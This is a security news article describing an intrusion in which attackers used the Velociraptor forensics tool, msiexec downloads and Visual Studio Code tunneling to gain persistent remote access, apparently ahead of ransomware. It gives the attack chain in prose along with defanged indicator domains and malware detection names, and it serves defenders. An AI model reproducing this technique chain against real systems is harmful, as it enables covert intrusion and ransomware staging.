In this case, attackers deployed the open-source Velociraptor digital forensics and incident response (DFIR) tool to establish remote access and pave the way for further compromise.
The incident highlights the increasing vulnerability of trusted software to manipulation, allowing malicious intent to be concealed.
The attack began with the use of the Windows msiexec utility, which downloaded an installer named v2.msi from a Cloudflare Workers domain identified as a staging site for malicious tools.
This installer deployed Velociraptor, a tool typically used by defenders to investigate intrusions, but here repurposed to communicate with a command-and-control server hosted on velo[.]qaubctgg[.]workers[.]dev.
Once installed, attackers executed an encoded PowerShell command to fetch Visual Studio Code from the same domain, running it with its tunnel option enabled.
The tunneling capability in Visual Studio Code, while designed for legitimate development use cases, has been abused in past incidents due to its ability to establish remote connections and enable code execution.
By activating this function, the attackers effectively turned the development environment into a covert channel to their server. To maintain persistence, the adversaries installed the program as a service and redirected its activity to log files.
Shortly after, they downloaded another malicious file named sc.msi, indicating continued staging of tools for later phases of the operation.
The suspicious use of Visual Studio Code tunneling triggered a Taegis
Analysis of the intrusion suggested that the activity would likely have progressed toward ransomware deployment if not disrupted.
The process tree revealed how Velociraptor was abused as the mechanism for launching Visual Studio Code’s tunneling mode, illustrating the attackers’ innovative use of a well-known incident response tool to mask malicious behavior.
Several related threats were identified during the investigation, including malware families detected as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK.
The presence of these indicators suggests that the attackers had already prepared the groundwork for later stages of the campaign, which would have likely included data encryption and extortion.
This incident reflects a concerning shift in attacker methodology, where legitimate tools designed for investigation and response are co-opted as stealthy offensive utilities.
By reducing their reliance on bespoke malware and instead blending with authorized software activity, adversaries improve their chances of evading initial detection.
For defenders, this means that unexpected instances of Velociraptor or anomalous use of Visual Studio Code tunneling should be treated as serious indicators of compromise.
Implementing strong endpoint monitoring, reviewing access to external domains, and practicing disciplined incident response remain essential measures to mitigate the evolving ransomware threat.
| Indicator | Type | Context |
| files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign |
| velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Exploiting Velociraptor – Cyberattackers Use Incident Response Tool for Remote Access appeared first on Cyber Security News.
In January, Qualcomm hinted to The Verge that it might finally bring its powerful Arm-based…
Students are seen on the campus of Columbia University on April 14, 2025, in New…
If you’ve been waiting to grab any video games, today might be the day. On…
I first took notice of Samson: A Tyndalston Story when its team of former Just…
Stardew Valley creator Eric Barone (ConcernedApe) has released a 10th anniversary video revealing, among other…
Highguard studio Wildlight Entertainment reportedly has less than 20 people remaining to work on the…
This website uses cookies.